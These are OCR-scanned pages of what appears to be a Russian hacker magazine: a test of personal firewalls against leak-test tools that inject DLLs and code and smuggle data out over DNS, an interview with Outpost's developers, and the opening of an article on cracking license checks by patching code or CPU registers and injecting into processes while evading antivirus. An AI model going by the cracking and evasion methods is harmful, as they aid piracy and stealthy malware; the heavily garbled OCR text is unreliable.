го нам понадобится утилита FireHole 
(iiip//keirnel/fireholehim!), Она бьет сразу по 
двум местам в безопасности - это и 
лаунчер, и а|-инжектор. Утилита тоже 
использует стандартный браузер, но 
внедряет в него свою dll, а уже после 
этого пытается установить связь с 
сервером. Если срайрвол начинает 
выкидывать тревожные окошки, все в 
порядке. В противном случае в окне 
программы появится надпись, говоря- 
щая, что сообщение отправлено в 
Сеть и файрвол не справился с пос- 
тавленной задачей. Устойчивость к 
лаунчу мы уже проверяли, поэтому 
тестирование проводилось с уже ра- 
ботающей Орега. Эту проверку прош- 


ли все... кроме одного. Кроме Outpost - 
странно. Но ничего: у него еще будет 
шанс исправиться. 

Дальше мы продолжим мучить на- 
ши бедные брандмауэры программой 
под названием YALTA или Yet 
Another LeakTest Application 
( ever.com/security test/En/index.htm), которая 
имеет два типа тестов: классический и 
продвинутый. Классический ориенти- 
рован на проверку правил доступа к 
портам по умолчанию, а продвинутый 
использует специальный драйвер, 
чтобы посылать пакеты прямо на се- 
тевой интерфейс. Удалось опробо- 
вать только первый тест, так как вто- 
рой работает только под 9х. Для про- 
верки были выбраны порты, рекомен- 
дованные разработчиками ЯЛТЫ (21, 
53, 67, 1030, 5555). Если файрвол за- 
пищит на каждую из попыток посыл- 
ки пакетов, то испытание можно счи- 
тать пройденным успешно. Это уда- 
лось сделать только ZoneAlarm'y. 
Kerio потерпел неудачу Ha 53 порту, a 
Outpost пропустил пакеты к 53 и 67 
портам, но при отправке данных на 53 
порт сообщил о неверном DNS-3anpo- 
се (конечно, "Does it leak?" никак не 
тянет на DNS-3anpoc). 

Следующим препятствием на пути 
файрволов к совершенству стали 
pcAudit и pcAudit2 (имиротетерато сот). 
Обе программы проверяют DLL injec- 
tion, но вторая отличается от первой 
тем, что пытается попасть не только в 
explorer.exe, но и во все другие запу- 
щенные в данный момент приложе- 
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ния. И если кому-нибудь из них разре- 
шен доступ в Сеть, то при песКуязви- 
мости загрузится страничка со списком 
срайлов папки "Мои документы" и 
скрином экрана (эффектно, неправда 
nu?). Оба теста провалил Kerio, но 
Outpost как раз справился. Результаты 
очень странные: FireHole делал то же 
самое, а вышло совсем наоборот. Воз- 
можно, методы внедрения а! разные. 
Но будем считать, что Outpost испра- 
вился. Да, чуть не забыл: ZoneAlarm 
выдержал все нападения с честью. 


Теперь проверим сетевые экраны на 
process injection. Для этого Bocnonb- 
3yemca Thermite 
( ). Утилита 
внедряет свой код непосредственно в 
адресное пространство удаленного 
процесса, создавая отдельный поток. 
В случае удачного внедрения и несра- 
батывания файрвола, на жестком дис- 
ке, в директории с термитом, появля- 
ется файл securityfocus.html. Kerio 
снова провалил тест. Остальные спра- 
вились. 

Copycat ( ) делает то же 
самое, что и Thermite, HO не создает 
поток для своего кода. Испытание 
пройдено успешно всеми. 

Далее в нашем арсенале появляет- 
ся Wallbreaker ( ). Ути- 
лита проводит четыре теста. Первый 
использует explorer.exe для вызова 
IE. Таким образом, получается, что 
браузер запустила не "вредоносная" 
программа, а проводник, и в случае 
доверия к нему со стороны файрвола 
информация с компьютера просочит- 
ся в Сеть. Второе испытание по-хитро- 
му запускает IE. Как сказал разработ- 
чик, "Это достаточно известная шут- 
ка, но многие firewalls на ней прокалы- 
ваются". Третий тест - это модисфика- 
ция первого, но для вызова IE он ис- 


WIPFW - КУСОЧЕК FREEBSD 


пользует следующую цепочку: 
Wallbreaker.exe-> cmd.exe-> 
explorer.exe-> iexplore.exe. Четвертый - 
расширение третьего теста. 
Wallbreaker, установивший заплани- 
рованную задачу, использует АТ.ехе, 
который в свою очередь выполнит 
задачу через svchost. Цепочка тако- 
ва: Wallbreaker.exe-> AT.exe-> 
svchost.exe-> cmd.exe-> explorer.exe-> 
iexplore.exe. Для добавления задания 
создается Ба{-срайл с произвольным 
именем. Чтобы тест полноценно сра- 
ботал, нужно чтобы планировщик за- 
дач Windows был запущен. Правда, 
ничто не мешает сделать это какой- 
нибудь вредоносной программе са- 
мой. Четвертое испытание провалили 
все, a Outpost ухитрился осрамиться 
на втором. 

Теперь мы попробуем провернуть 
фокус с саморестартингом. В этом нам 
поможет Ghost ( ). Ког- 
да мы запускаем какое-нибудь прило- 
жение, для которого не установлены 
правила доступа в Сеть, файрвол при 
помощи \\пАР!-ункций получает 
PID и имя процесса, приостанавливает 
его и предлагает пользователю выб- 
рать его дальнейшую судьбу. Ghost 
же, как только передает сведения о 
себе, сразу "убивает" себя и тут же 
снова стартует. Затем он запускает IE 
и передает на сервер указанную в на- 
чале теста строку. Если файрвол не 


следит за дочерними процессами или 
просто не успевает сработать вовре- 

мя, мы будем лицезреть страничку с 
наполовину затертыми !Р-адресами 
таких же счастливых обладателей се- 
тевых экранов. Это серьезное испыта- » 
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ЖЕСТКИЙ ТЕСТ ФАЙРВОЛОВ ) 


DNS). Троянцы вполне могут послать тесты популярных стенок (английский) 


пароли иеще что-нибудь своему хо- № www.agnitum.com/php_scripts/compare2.ru.php - таблица, кото- 
зяину. Как ни проста и ни опасна Ta- 


кая идея, сопротивляться программе рая показывает эффективность Outpost в сравнении с другими 
реализующей ее, смог только персональными брандмауэрами (составлена разработчиками 


ZoneAlarm. Outpost) 
Последней внутренней проверкой 

стал Surfer 

(www firewallleaktester.com/leaks/surfer.exe). Утилита 


ние прошли все: и ZoneAlarm, и ССЫЛКИ ПО ТЕМЕ 
a Outpost, и Kerio Personal Firewall. 
о Следующая программа называется Ш www.firewallleaktester.com/tests.htm - весьма жесткий тест 
>. DNS tester (мии klake.org/-t/dnshell. B onepa- файрволов на "течи" 

ционных системах w2k/WinXP имеется Я 2 
4 сервис О№-клиента, который выпол- Ш http://security.symantec.com/default.asp?productid= 
о няет все О№5-запросы. Само собой, symhome&langid=ie&venid=sym - онлайн-тест файрвола на откры- 
6 файрвол должен доверять этой служ- тые порты 
1 6e (svchost.exe) no ana иначе Ш www.infotecs.ru/terminet/grc.htm - еще один подобный тест 
> нь ш www.dsireports.com/scan - иеще один 
= минать не имена сайтов типа : Е 
= www.xakep.ru, а их IP-agpeca. DNS Ш www.firewall-net.com - хороший сайт с тестами и помощью по yc- 
o tester использует эту службу, чтобы тановке (английский) 
> передать данные на сервер (вовсе не Ш www.pcflank.com/art4ic.htm - Personal Firewalls vs. Leak Tests, 
о 
ш 
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создает скрытый десктоп, затем за- А 114. 208 = a i 
пускает в нем IE, He передавая ему ни- рр as —— sz аа 
какого url'a. После этого стартует но- 
вая копия IE, а первая уничтожается. 
Протокол url передается через DDE 
новой копии браузера. Все эти хитрые == : =a 
манипуляции были сделаны потому, % ава } $1 “2 
что многие сфрайволы контролируют ыы \ = 
прямой вызов ShellExecute или =. банный : 
CreateProcess. Как оказалось, не зря =" , 
мучились авторы утилиты: Outpost 3a- = o= 
валил финальный экзамен, a Kerio и or аи м 
ZoneAlarm устояли. = 

Итак, все тесты пройдены, и для = &= Р 
окончательного прояснения картины ие = д 
внутренней безопасности предлагаю и : = 
посмотреть на таблицу, в которой све- —— _ a 
дены результаты всех тестов испыту- — — — 
емых экранов. че ‚= — 

Бесспорным лидером объявляем — STS Se ee Se ee Se ee ee 
ZoneAlarm Security Suite. Kerio и er вла ьых 


- примерно на ВНЫХ. нак. 
Outpost - примерно Pe OdiaKe Результаты Outpost'a Ha PCFlank 
CTOUT обратить внимание на то, что 


Kerio практически совершенно не yc- 


тойчив к inject'y, a у Outpost'a, хоть OH не извне. Многие разработчики KOH- Вторая онлайн-утилита представляет 
и проваливался на некоторых тестах, фигурируют свои продукты по умол- собой продвинутый сканер портов. Он 
не наблюдалось никаких тенденций к чанию так, чтобы сразу после инстал- имеет довольно много настроек: тех- 
неудачам. ляции ими можно было пользовать- ника скана (TCP connect или TCP 
ся. По их мнению, стандартная кон- SYN), выбор диапазона портов и gp. 
А ЧТО СНАРУЖИ??? фигурация подходит большинству Еще один инструмент для проверки 
и Следующим этапом проверки на- пользователей. privacy - браузер сканер. OH проверя- 
ших файрволов будет сканирование Теперь выберем инструменты для ет, сколько персональной информа- 
портов. Повторюсь, что успех в пре- проверки. Первый попавшийся мне ции отсылает обозреватель интерне- 
одолении этого испытания зависит в онлайн-сканер располагался на та :) на удаленный сервер. Еще имеет- 
большей степени от пользователя, а им осИалксот. Собственно, на этом сайте ся тест на троянцы и эксплойт-тест. 
не от сетевого экрана, поскольку собрано шесть тестов, позволяющих Мы будем использовать Quick test, ко- 
всегда есть возможность настроить испытать защиту компьютера в Сети торый включает в себя продвинутый 
правила доступа к портам настолько со всех сторон. Первый из них - это скан портов, браузер-тест и троян- 
криво, что любой чуть грамотный ха- Stealth Test. Он проверяет машину на тест, однако, замечу, для нашей зада- 
кер поломает систему за пять минут. "видимость" в интернете. Для этого чи подошел бы и простой скан пор- 
Поэтому для чистоты эксперимента используются такие технологии ска- тов, так как троянцев на моей машине 
были оставлены нетронутыми наст- нирования, как ТСР ping, TCP NULL, нет, а проверять бродилку не входит в 
ройки, отвечающие за доступ к маши- ТСР FIN, ТСР XMAS и UDP scanning. поставленную задачу. Итак, выбираем 
ZoneAlarm + + + +/+/+/+/+ + + + + +/+/+/- + + + 
Kerio Personal 
Firewall + + + +/-/+/+/+ - - - + +/+/+/- + - + 
Outpost Firewall + + 5 +/-/-/+/+ + + + + +/-/+/- + 7 ы 


Таблица с результатами тестов на "течи" 
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Сканирование портов на HackerWatch 


ссылку Quick test, читаем подробности 
теста, жмем кнопочку Start test и 
ждем некоторое время в зависимости 
от скорости соединения с Сетью, 
обычно не больше трех минут. Томи- 
тельные секунды прошли, и что же 
мы видим? Тест на троянцы прошли 
все файрволы (еще бы!), со сканиро- 
ванием портов тоже справились все, 
a privacy check "на пять" не сдал ник- 
то. Outpost был хуже всех, но есть по- 
дозрение, что это легко лечится гра- 
мотной настройкой. 

Я не стал задерживаться на этом ре- 
сурсе дольше и пошел искать еще 
что-нибудь, чем можно проверить на- 
ши экспонаты. И, как ни странно, на- 
шел. 11//5сап.5уоае.сот - онлайн-сервисы 
для проверки сетевых экранов, при- 
чем от производителя одного из них, 
к сожалению, не включенных в этот 
обзор. Нам сходу предлагается прой- 
ти проверку, которая соберет некото- 
рую информацию о машине и попро- 
бует просканить порты. Жмем на кно- 
почку Scan now и ждем; через нес- 
колько секунда загружается странич- 
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Тревожное окошко Outpost 


ка, на которой, кроме версии браузера 
и операционной системы, ничего нет. 
Тест не определил имя компьютера и 
запущенные сервисы, значит, файр- 
волы справились. 

Ho на этом я не успокоился и решил 
попробовать Stealth scan. Этот тип 
проверки сканирует порты следую- 
щих служб: FTP DATA - 20, FTP - 21, 
SSH - 22, SMTP - 25, NetBIOS - 139, 
Server Message Block - 445 и др. Здесь 
все справились "на отлично", все пор- 
ты были жестко заблокированы. 

Для того чтобы полностью убедить- 
ся в силе стандартных настровк, я отп- 
равился на мии iackerwaich.org. Здешний на- 
бор тестов не так многообразен, как на 
предыдущих ресурсах, но порт-сканер 
есть. Им мы и воспользуемся. Жмем 
на соответствующую пимпочку и ви- 
дим, что он проверяет все те же порты 
разных сервисов, и все испытуемые 
срайрволы также удачно справились с 
этим заданием. 

На этом я решил остановиться. Яс- 
но, что персональные сфайрволы 
справляются с внешними угрозами го- 
раздо лучше, чем с внутренними. Все 
продукты показали высокий уровень 
зашиты компьютера от сетевых атак и 
сканирования. 


ПОДВЕДЕНИЕ ИТОГОВ 

= Вот мы и провели проверку основ- 
ных функций персонального файрво- 
ла. Все разработчики заявляют, что 
их продукты могут то и то, но не гово- 
PAT, насколько качественно реализо- 
ваны эти возможности. Несколько 
лет назад тесты на "течи" провалили 
бы практически все брандмауэры. 
Тогда воротилы зесигЙу-индустрии 
просто делали вид, что таких проб- 
лем не существует, и упорно закры- 
вали глаза на результаты независи- 
мых испытаний. Но времена измени- 
лись, и программисты всерьез заня- 
лись своей работой. 

Вопрос "какую стену выбрать" - это, 
конечно, личное дело. Существует 
множество подобных приложений, но 
они должны обязательно подвергать- 


ся подобным экзаменам. Мы выбрали 
три самых популярных файрвола, они 
заслуженно завоевали почет и ува- 
жение пользователей. Каждый из них 
представляет собой не просто ПФ, а 
целый комплекс по обеспечению бе- 
зопасности машины в Сети. В 
ZoneAlarm Security Suite, например, 
включено средство, предохраняющее 
переговоры в IM. Также дфишкой 
Alarm'a является то, что к любому 
предупреждению файрвола можно 
получить подробное разъяснение на 
официальном сайте. Причем для это- 
го совсем не обязательно долго бро- 
дить по РёгпЕстраничкам - нужно прос- 
то кликнуть на кнопочке "Инфо" в 
тревожном окошке. 

Outpost тоже очень хорош. Помимо 
стандартных для всех персональных 
сетевых экранов функций (резка 
всплывающих окон, сохранение кон- 
фиденциальной информации и т.д.), к 
нему можно прикручивать дополни- 
тельные программные модули. 

Kerio Personal Firewall прост в наст- 
ройке и достаточно надежен, к тому 
же он имеет возможность перехвата 
запуска абсолютно всех приложений, 
а не только тех, которые хотят в Сеть. 

Выбор остается за пользователем... 
Некоторым нужна простота и легкость 
настройки, некоторым - высокая сте- 
пень защиты, и им не жалко потра- 
тить несколько часов на детальную 
конфигурацию сфрайрвола, а некото- 
рым нужен полный контроль над сис- 
темой в режиме онлайн. 


Все продукты и тесты, описанный в 
этой статье, ты можешь найти на на- 


шем диске. 
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ИНТЕРВЬЮ С AGNITUM ) 


Андрей Каролик (andrusha@real.xakep.ru) 


ИНТЕРВЬЮ 
С AGNITUM : 


ВОПРОСЫ РАЗРАБОТЧИКАМ OUTPOST FIREWALL 


orga-To Outpost Firewall был малоизвестен (о нем слышали, HO мало кто пробовал), позже OH прочно занял свое 
место среди файрволов наравне с другими популярными отечественными разработками. Мы решили узнать 
побольше об Outpost'e от его разработчиков. 
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XS: Откуда такая Ha- 


правленность - cpaiip- 


волы? Есть ли другие 


разработки или это ос- 
новное и единственное 


направление? 


Михаил Пеньковский, коммерческий 
директор компании "Агнитум": Это, ес- 
ли можно так выразиться, наша судь- 
ба. Самой первой утилитой, вышед- 
шей "из-под клавиатуры" нашей ком- 
пании, был Jammer (Джаммер), дале- 
кий прообраз Toro Outpost'a, извест- 
ного всем. Дабы понять разницу, 
представь допотопный велосипед и 
сравни его с современным мотоцик- 
лом. Джаммер обеспечивал защиту от 
атак троянскими вирусами, а также 
позволял осуществлять простейший 
контроль над приложениями, пытаю- 
щимися установить интернет-соеди- 
нения. Именно благодаря успеху 
Джаммера мы смогли начать разра- 
ботку Outpost Firewall, сделав инвес- 
тиции в расширение штата компании. 
Outpost Firewall Pro позволил нам 
выйти на принципиально новый уро- 
вень как с точки зрения технологии, 
так и с точки зрения бизнеса. Мы да- 
ли рынку не просто программу, а "про- 
дукт" во всех смыслах этого слова. 
Благодаря дайрволу мы выросли из 
маленькой команды из пяти энтузиас- 
тов и удаленной работы на дому до 
стремительно растущей компании, 
состоящей из 30-ти профессионалов. 


Х5:Какие проблемы при создании 
возникали, как вы решали их? 


Михаил Пеньковский; Стоит отме- 
тить, что за любым успешным продук- 
том или технологией стоят талантли- 
вые люди, которые были объединены 
общей идей. В случае с "Агнитумом" 
все именно так: на каждом этапе на- 
шего развития нам удавалось привле- 
кать в компанию талантливых разра- 
ботчиков, программистов, тестеров и 
инженеров поддержки. Поэтому "не- 
разрешимых" технически задач на 
этапе разработки продукта просто не 
было, по крайней мере мы всегда отно- 
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симся к трудностям как к "решаемым". 
И время показало, что так оно и есть. 


XS: Существует ли сейчас в России 
кризис разработки подобного ПО? 


Михаил Пеньковский: Опыт наших 
коллег из Лаборатории Касперского 
показывает, что в России можно зара- 
батывать достойные средства на раз- 
работке и продаже ПО. Проблема пи- 
ратства, конечно, есть, но она не так 
актуальна, как пять-семь лет назад. В 
данный момент Россия делит третье- 
четвертое места с Англией в объеме 
продаж компании "Агнитум", уступая 
лишь Германии и США. И это логич- 
но: во всем мире производители полу- 
чают большую долю прибыли с ло- 
кальных рынков. Это отражается и на 
нашей активности на международных 
рынках. Именно в США, Германии и 
России мы наиболее активно инвести- 
руем комплекс маркетинга и развива- 
ем каналы сбыта. 


Х5:Как боретесь с пиратами? 


Михаил Пеньковский: С 2002 no 
2004 год мы удваивали объемы про- 
даж, а в 2005 году рост относительно 
прошлого года составляет 50%, что 
также является хорошим результа- 


том. При подсчетах так называемых 
убытков от деятельности пиратов 
многие забывают, что далеко не все 
покупатели виртуальных сфлибустье- 
ров готовы приобрести продукт по 
официальной стоимости, поэтому 
речь идет не об "убытках", а об упу- 
щенной потенциальной прибыли. А 
это, согласись, разные вещи. К тому 
же в случае с Outpost'om у нас доста- 
точно сложная для взлома система 
регистрационных ключей, что сущест- 
во снижает пиратское распростране- 
ние. 


XS: Какие ноу-хау реализованы в 
Outpost? Или же в нем были исполь- 
зованы хорошо одрормленные чужие 
наработки? 


Михаил Пеньковский: Надо пони- 
мать, что все производители находят- 
ся в одном и том же информационном 
пространстве. Если сегодня мы реали- 
зовали интересную идею, то завтра 
большинство конкурентов добавят ее 
в свои продукты. В свою очередь, мы 
также анализируем деятельность кон- 
курентов и иногда берем на вооруже- 
ние их идеи, адаптировав и улучшив 
их на свой лад. Без этого невозможен 
прогресс, и разработка программных 
продуктов здесь ничем не отличается 
от разработки новых автомобилей. 
Outpost прежде всего выделяет себя 
среди конкурентов уровенем безопас- 
ности, который получает пользова- 
тель, установив продукт на свою сис- 
тему. Последние два года мы усилен- 
но работаем именно над этим компо- 
нентом, сделав высокие защитные 
свойства своеобразной визитной кар- 
точкой Outpost'a. В каждой новой вер- 
сии мы укрепляем броню файрвола 
новыми механизмами, оправдывая 
ожидания наших пользователей. Вто- 
рая отличительная черта - комплекс- 
ный подход к настройкам продукта. 
Outpost может освоить и новичок, и 
продвинутый пользователь. Первый 
может воспользоваться автоматичес- 
кими настройками, не углубляясь в 
детали. Второй же приятно удивится 
богатству опций по конфигурации за- 
щиты файрвола. В отличие от 
Outpost'a, другие файрволы сделаны 
либо аля новичков, что делает их ис- 
пользование бессмысленным для 
пытливых пользователей, либо для 
профессионалов, что делает невоз- 
можным их потребление среднеста- 
тистическими пользователями. 


XS: Успех был обеспечен маркетин- 
гом или преимуществами продукта? 


Михаил Пеньковский: Я бы рассмат- 
ривал техническую реализацию и 
маркетинговую стратегию как комп- 
лекс мер, который и позволил нам go- 
биться успеха. Так, выпустив первую 
версию продукта с отличными техни- 
ческими характеристиками, мы были 


слишком маленькой компанией и не 
обладали средствами для организа- 
ции рекламной кампании, но чисто 
маркетинговая идея по выпуску бесп- 
латной версии с ограниченным ‹функ- 
ционалом позволила нам взять рез- 
вый старт и завоевать большую попу- 
лярность у пользователей, экспертов 
по безопасности и прессы. Если бы 
продукт был слабым, то успеха бы не 
было, равно как без этой идеи мы не 
смогли бы так быстро провести про- 
моушен продукта при таком бюджете. 
Дальнейшие наши успехи опять же 
связаны с правильной маркетинговой 
стратегией и отличной технической 
реализацией. 


XS: Сотрудничаете ли вы с хакерами, 
чтобы быть ближе к проблеме? Какие 
цели дальнейшего совершенствова- 
ния файрвола? 


Михаил Пеньковский: Нет, не сот- 
рудничаем. Цели определяем исходя 
из трех принципов: требования рынка, 
собственные инновации и требования 
существующих пользователей. 


XS: Какие проблемы срайрвол не мо- 
жет решить? 


Алексей Белкин, технический специ- 
алист компании "Агнитум": В данный 


| 


момент мы не можем найти и удалить 
вирусы, блокировать спам. Но это 
предмет будущих разработок. 


Х5:Какое будущее у дфайрволов? 
Чем закончится гонка вооружений ха- 
керов и разработчиков? 


Алексей Белкин: Гонка будет про- 
должаться, но свои коррективы будут 
вносить новые версии операционных 
систем и Windows, в частности. Также 
не стоит сбрасывать со счетов вари- 
ант создания централизованного ор- 
гана контроля пользователей а-ля 
продвинутый Net-Passport. Однако 
полностью решить проблему хакеров 
и угроз компьютерной безопасности 
практически невозможно. Проблема 
криминальной активности существует 
с самого рождения человечества, 
просто сейчас мы наблюдаем ее в 
другой среде - виртуальной. Как и лю- 
бая система, наша все время колеб- 
лется между состояниями равновесия 
и преимущества какой-либо из сто- 
рон. Достаточно интересен интеллек- 
туальный анализ активности прило- 
жений, хотя, как показывает практика, 
в настоящее время эвристические 
анализаторы уже не столь популяр- 
ны, как ранее. Прошу прощения за ба- 
нальность, но очень хороший хакер 
всегда сможет обойти любую защиту. 
То, что в настоящее время понимает- 
ся под интеллектуальным анализом 
активности, как правило, довольно 
примитивные механизмы, не намного 
сложнее логики кофеварок. Уместна 
аналогия с охраной высокопоставлен- 
ных лиц. Она никогда не сможет дать 
100% гарантию безопасности, но мо- 
жет защитить от 99% процентов воз- 
можных бед, исходящих от средне и 
слабо подготовленных злоумышлен- 
ников. Мы даем пользователю воз- 
можность быть спокойным до тех пор, 
пока им не заинтересуются "гуру". И 
стремимся не к тому, чтобы обеспе- 
чить невозможные 100%, а к тому, 
чтобы сделать наиболее комфортной 
работу в рамках тех 99%, которые мо- 
жем предоставить. 
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МАЛОИЗВЕСТНЫЕ СПОСОБЫ ВЗЛОМА 


акерские методики совершенствуются, между тем широкой крэкерской общественности ничего об этом не 
известно. Ходят какие-то неясные слухи, но пошаговой инструкции взлома никто не предлагает. Мы раскусили 
некоторые малоизвестные способы взлома клиентских приложений. 
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ОБЗОР СПОСОБОВ 


ВЗЛОМА 


м Клиентские прило- 


жения можно ломать 
по-разному. Возмож- 
ностей просто море, главное - иметь 
фантазию, тогда это не хакерство, а са- 
мая настоящая камасутра получается! 
Одни хакеры предпочитают локальный 
взлом, другие - удаленный. Сейчас по- 
говорим о локальном взломе. На самом 
деле в хакерском мире все взаимосвя- 
зано, и локальный взлом можно рас- 
сматривать как заключительную ста- 
дию удаленной атаки. 

Будем исходить из того, что на вра- 
жеском компьютере уже находится 
собственный код хакера. Забросить 
его можно различными путями. Нап- 
ример, найти переполняющийся бу- 
qpep и затолкать в него shell-Kkog или 
зарядить электронное письмо "нехо- 
рошим" вложением. В общем, эта ме- 
тодика уже давно отработана и отш- 
лифована до зеркального блеска. Ви- 
русы, черви, троянские лошади так и 
прут - только успевай затыкать дыры. 
А количество дыр, обнаруженных в 
Windows за последние полгода, пере- 
ходит все границы терпимости и гума- 


низма. Каждый месяц приходится ка- 
чать по полста метров заплаток, прак- 
тически все из них критические. Но 
кто качает их? Так, считанные едини- 
цы! Корабль под названием 
"Windows" дал серьезную течь, трес- 
нув по всем швам. Миллионы незала- 
таных машин ждут своего часа! 

Локальное воздействие на атакуе- 
мую машину до сих пор замалчивает- 
ся как специалистами по информаци- 
онной безопасности, так и хакерами. 
Дальше примитивных методов сокры- 
тия файлов и процессов дело обычно 
не идет. Вызывать паН\е-АР! операци- 
онной системы можно, но... бесполез- 
но. Заразить NTOSKRNL.EXE таким 
способом все равно не удастся, к тому 
же любая модисфикация системных 
файлов слишком заметна. Лучше во- 
евать с исполняемыми файлами пря- 
мо в памяти! 


МОДИФИКАЦИЯ БЕЗ 
ИЗМЕНЕНИЯ 

m Классика - это не только Достое- 
вский с Толстым, но и изменение за- 
щитных байт в файле или памяти (бо- 
лее известное под именем "bit hack"). 
Такой же древний, неинтересный, на- 


Спуск Windows'a на воду 
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вязший у всех на зубах прием. Легко 
обнаруживаемый, да к тому же юриди- 
чески далеко не безупречный. Моди- 
Ффикация программного обеспечения - 
это статья. А статья - это ласты :). "Не- 
санкционированный доступ к инфор- 
мации" и все такое. 

Можно ли хакнуть приложение, не 
прикасаясь к нему? Вопрос не так 
глуп, как кажется: в нашем распоря- 
жении есть и ментальные методы. 
Попросту говоря, голова. Пусть мы не 
можем модифицировать код и данные 
приложения, но насиловать регистры 
процессора нам никто не запрещает! 
Процессор, в отличие от программно- 
го обеспечения, продается, а не ли- 
цензируется, то есть мы можем де- 
лать с ним все, что вздумается. 

Рассмотрим типичную программу, 
вызывающую защитную срункцию, за 
которой следует условный переход, 
действующий по принципу "свой-чу- 
жой". В ассемблерном виде это может 
выглядеть приблизительно так: 


CALL check something 

TEST EAX,EAX 

№ 

virus_or ем! hacker has detected ап м1] be destroy 
CALL all_ok continue normal execution 


Что можно сделать? Нечестные Ba- 
рианты: а) подправить функцию 
check_something так, чтобы она всег- 
да возвращала TRUE (XOR 
EAX,EAX/DEC EAX/RETN и телемар- 
кет); 6) изменить TEST EAX,EAX на 
XOR ЕАХ,ЕАХ, чтобы независимо от 
результатов проверки, регистр ЕАХ 
всегда был равен нулю; в) удалить ко- 
MaHgy JNZ, заменив ее операцией 
MOV EAX,EAX (то же самое, что и 
МОР, только из двух байтов). Все эти 
способы серьезно конорликтуют с за- 
коном. На тебя могут наехать и серь- 
езно затоптать. 

А вот сравнительно честный метод 
взлома: дожидаемся выхода из функ- 
ции check_something и тут же моди- 
сфицируем регистр ЕАХ, устанавливая 
его вТили в FFh. Это же наш регистр, 
выкупленный у компании Intel (или 
АМО), и авторское право на него не 


NUCLEAR DISARMAMENT 
WORLD PEACE A JUSTICE 


распространяется! Нет-нет, команда 
TEST ЕАХ,ЕАХ остается нетронутой, и 
целостность ломаемой программы ни- 
как не нарушается. Воздействию nog- 
вергается лишь сам регистр. 

Как вариант, можно дождаться за- 
вершения выполнения команды TEST 
EAX,EAX и подправить регистр срла- 
гов, а точнее срлаг Zero. Или изменить 
ЕР таким образом, чтобы он прыгал 
на нужную нам ветку. Никакой закон 
не может заставить нас выполнять 
тот код, выполнять который мы не хо- 
тим! Это же сплошное насилие полу- 
чается! 

Правда, хороших юристов это не ос- 
тановит :). Уголовный кодекс в пер- 
вую очередь смотрит на конечный ре- 
зультат, игнорируя пути его достиже- 
ния. Зарубить человека можно топо- 
ром, купленным на честно заработан- 
ные, но вряд ли это станет оправдани- 
ем. Другими словами, пользоваться 
взломанной программой все равно 
незаконно. Но мы же и не собираемся 
ей пользоваться, мы совсем другого 
хотим: внедриться на атакуемый 


компьютер так, чтобы никакая антиви- 
русная собака даже не тявкнула. 

Как это можно осуществить практи- 
чески? Первое, что приходит на ум, - 
присоединиться к атакуемому процес- 
су путем DebugActiveProcess (или отк- 
рыть процесс с флагом 
DEBUG_PROCESS), некоторое время 
потрассировать его, дожидаясь вы- 
полнения нужной команды, затем 
"подрихтовать" регистры и отпустить 
бразды правления. Звучит прекрасно, 
но работает только на бумажных про- 
цессах. В диких джунглях реального 
двоичного кода трассировка умирает 
еще в упаковщике/протекторе. К тому 
же она очень медленно работает, что 
Тут же демаскирует атаку, не говоря 
уже о том, что АР|-функции трассиро- 
вать нельзя и приходится предусмат- 
ривать обходной код, в результате че- 
го трассировщик разрастается до раз- 
меров слона. 

А что если установить аппаратную 
точку останова? Если только атакуе- 
мая программа не предпримет специ- 
альных усилий (например задейству- 
ет все четыре точки останова под 
собственные нужды), этот прием мо- 
жет неплохо сработать! Проблема в 
том, что точка останова устанавлива 
ется на линейный, а не физический 
адрес, и потому обработчик отладоч- 
ного исключения (которое генериру- 
ется при обращении к соответствую- 
щей ячейке памяти) возбуждается в 
контексте данного процесса. А это 
значит, что для успешной реализации 
атаки мы должны проникнуть в чужое 
адресное пространство. 

Это можно сделать создав удален- 
ный поток, за что отвечает функция 
CreateRemoteThread (в 9х она He ра- 
ботает, но 9X - уже почти труп), или 
воспользоваться связкой 
VirtualAllocEx/WriteProcessMemory. 
Обе технологии давно отработаны и 
описаны в сотнях хакерских мануа- 
лов. Большинство троянов именно так 
и работает. А вот это уже нехорошо. 


В семействе МТ природа точек останова - 
сугубо локальная. 


Теряется сфрактор новизны, неожидан- 
ности и внезапности. Разработчики 
антивирусов активно работают над 
созданием оружия, срубающего BHeg- 
ряющийся код еще на излете. К тому 
же вторжение в чужое адресное 
пространство может быть расценено 
как модификация приложения в па- 
мяти. Юристам ведь не объяснишь, 
что авторские права распространяют- 
ся лишь на образ приложения на дис- 
ке/памяти, но отнюдь не на адресное 
пространство целиком! 

В принципе, можно разместить отла- 
дочный обработчик в области памяти, 
принадлежащей операционной систе- 
ме, например KERNEL32.DLL. Microsoft 
довольно лояльно относится к таким 
проделкам, и ее практикуют довольно 
многие коммерческие программы, но 
здесь есть одно "но". Все, что нахо- 
дится ниже адреса 80000000, сос- 
тоит в прямом ведении прикладного 
процесса и на каждый из них проеци- 
руется индивидуально. То есть если 
мы изменим пару байт в "своей" про- 
екции KERNEL32.DLL, все остальные 
процессы не узнают об этом! А это 
значит, что внедрение отладочного 
обработчика должно осуществляться 
из контекста атакуемого процесса, 
следовательно, мы должны внедрить- 
ся и модисрицировать его! Замкнутый 
круг? Не совсем. Можно, к примеру, 
модифицировать KERNEL32.DLL на 
диске. Технически это возможно (хотя 
и непросто), но... нас сразу же обнару- 
жат! Первой возмутится SFC (а это 
значит, что ее придется отключать), 
за ней потянутся антивирусные сторо- 
жи, ревизоры, мониторы и прочие си- 
ловые структуры. Нет, этот метод не 
подходит. 

А почему бы не загрузить свой 
драйвер и не разместить отладочный 
обработчик внутри него? Верхняя по- 
ловина адресного пространства (от 
800000001 и выше) проецируется на 
все процессы. Сюда загружается 
NTOSKRNL.EXE и драйверы, следова- 
тельно, наш драйвер будет "виден" из 
любого процесса. Более элегантного 
и, самое главное, законного способа 
внедрения, пожалуй, и не придума- 
ешь. От победы и финала нас отделя- 
ет только одна маленькая проблема, а 
именно то, что верхняя половина ад- 
ресного пространства недоступна 


Можно ломать не только программы, но и процессоры 


Все описанное 
в статье - 
просто инфор- 
мация. Если 
решил что-то 
проделать в 
реале, всегда 
думай о после- 
оствиях для 
своей задницы. 


По идее реги- 
стры процессо- 
ра никаким бо- 
ком не отно- 
сятся к прило- 
жениям, и их 
изменение не 
нарушает про- 
писанных за- 
конов. Но по- 
пробуй дока- 
зать, что ты не 
верблюд. Тем 
более что су- 
дят по резуль- 
татам, а не 
средствам их 
достижения. 
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Отключить за- 
щиту можно 
через драйвер, 
так как он ис- 
полняется на 
нулевом кон- 
це, что и тре- 
буется. 


Любой драйвер 
может моди- 
фицировать 
содержимое 
таблицы пре- 
рываний IDT. 
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прикладным процессам. Попытка ne- 


